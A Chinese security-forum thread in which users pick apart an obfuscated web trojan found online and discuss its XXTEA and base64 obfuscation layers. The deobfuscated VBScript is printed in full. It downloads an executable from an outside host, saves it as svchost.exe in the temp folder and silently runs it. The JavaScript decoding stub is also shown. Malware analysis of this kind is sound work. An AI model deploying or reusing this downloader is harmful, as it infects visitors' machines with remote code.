【脚本】刚刚挖掘的时候发现的

jimmyleo

一个脚本 很晕 不知道用了什么混淆手段……
有兴趣的大家一起研究下 呵呵~

solcroft

... 解不来 在哪里找到的？

jimmyleo

这里
http://bbs.kafan.cn/redirect.php ... o=lastpost#lastpost

kkgh

强，过卡7

solcroft

1.     on error resume next
   
2.     wm1="o"&"bj"&"ect"
   
3.     wm2="classid"
   
4.     awm="C556"&"-"&"65A3"&"-"
   
5.     wm3="clsid"&":"&"BD96"& awm &"11D0"&"-"&"9"&"8"&"3"&"A"&"-"&"00C04FC29E36"
   
6.     wm4="M"&"icro"&"soft"&".XMLHTTP"
   
7.     wm5="Shell.Application"
   
8.     wm6="Scripti"&"ng.Fil"&"eSystemObject"
   
9.     Set XsKjWMc = document.createElement(wm1)
   
10.     XsKjWM = "http://q.1030829.com/vip.exe"
    
11.     sub yunxingexe(wm5,Xskj9)
    
12.     set XsKjWMeE = XsKjWMc.createobject(wm5,"")
    
13.     XsKjWMeE.shEllExEcutE XsKjWM9,"","","o"&"p"&"e"&"n",0
    
14.     end sub
    
15.     XsKjWMc.setAttribute wm2, wm3
    
16.     XsKjWMi=wm4
    
17.     Set DXsKjWM = XsKjWMc.CreateObject(XsKjWMi,"")
    
18.     wmiaof="Ado"
    
19.     wmiaog="db."
    
20.     wmiaoh="Str"
    
21.     wmiaoi="eam"
    
22.     XsKjWMf=wmiaof&wmiaog&wmiaoh&wmiaoi
    
23.     XsKjWMg=XsKjWMf
    
24.     set XsKjWMa = XsKjWMc.createobject(XsKjWMg,"")
    
25.     XsKjWMa.type = 1
    
26.     XsKjWMh="G"&"E"&"T"
    
27.     DXsKjWM.Open XsKjWMh, XsKjWM, False
    
28.     DXsKjWM.Send
    
29.     XsKjWM9="svchost.exe"
    
30.     set XsKjWMb = XsKjWMc.createobject(wm6,"")
    
31.     set XsKjWMeE = XsKjWMb.GetSpecialFolder(2)
    
32.     XsKjWMa.open
    
33.     XsKjWM9= XsKjWMb.BuildPath(XsKjWMeE,XsKjWM9)
    
34.     XsKjWMa.write DXsKjWM.responseBody
    
35.     XsKjWMa.savetofile XsKjWM9,2
    
36.     XsKjWMa.close
    
37.     call yunxingexe(wm5,Xskj9)
    
38.    
    
39.    

复制代码

网马好像是从http://q.1030829.com/mmm.htm来的，那个sss.htm指向的webxls.htm不知道是不是有效的脚本，我用浏览器打开也没反应

等其他的高手来看看

dikex

<script language =javascript>function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4){case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}return out.join('');}var fans=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function fan(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";while(i<len){do{c1=fans[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)break;do{c2=fans[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=fans[c3]}while(i<len&&c3==-1);if(c3==-1)break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=fans[c4]}while(i<len&&c4==-1);if(c4==-1)break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}return out}function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++){v=String.fromCharCode(v&0xff,v>>>8&0xff,v>>>16&0xff,v>>>24&0xff);}if(w){return v.join('').substring(0,sl);}else{return v.join('');}}function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4){v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}if(w){v[v.length]=len;}return v;}function xxtea_decrypt(str,key){if(str==""){return"";}var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}return long2str(v,true);}chenzi=WJ4UaqFcXcqC3cu7QEHb3jjRecti6SnEgIo/0UMycDtBzQYYoDK7f0ij2QtPBRYbueAi+S53sC+e 0m1fjSOVGRGNqPuVvhvLi2UzXS77fjFFH+XwX05idskMW2okMvmV27YjFQWzRc1vvLd8VL/Wkrs7 diO5dIUtAH8cloVE5KGD2hUDn906vLq4IlJZ4pq92xSK0z3b0AnFfk/JkSod5drSzblZH6JNLEUi hacFVfT3unMHMxElxWEaCKvv1NVatzpfqRdqZIovnj9RLL+GlKOk50n8bJextDSd4iVK4mkBr9qV HpwZG9vSOgGNyf4bg9yGdai chenzi=utf8to16(xxtea_decrypt(fan(chenzi),'vip'));document.write(chenzi);</script>

解了第一步后得到上面的这个，看上去是utf8to16、base64之类的东西，但接下来却无法解了，即使用alert也什么也得不到，奇怪……

jimmyleo

刺猬来了
第一层是用了什么混淆呢 为什么这么多乱码？

IllusionWing

貌似死尸一个..

dikex

他就是利用函数把那些代码变成一堆乱码以混淆别人，抓住最后的document.write这个语句就可以解开第一层了

jimmyleo

多谢刺猬指点 呵呵~
混淆真是比加密还恶心~
第二层貌似是xxtea算法
关键其实也是write 但是不知道是他没写好还是……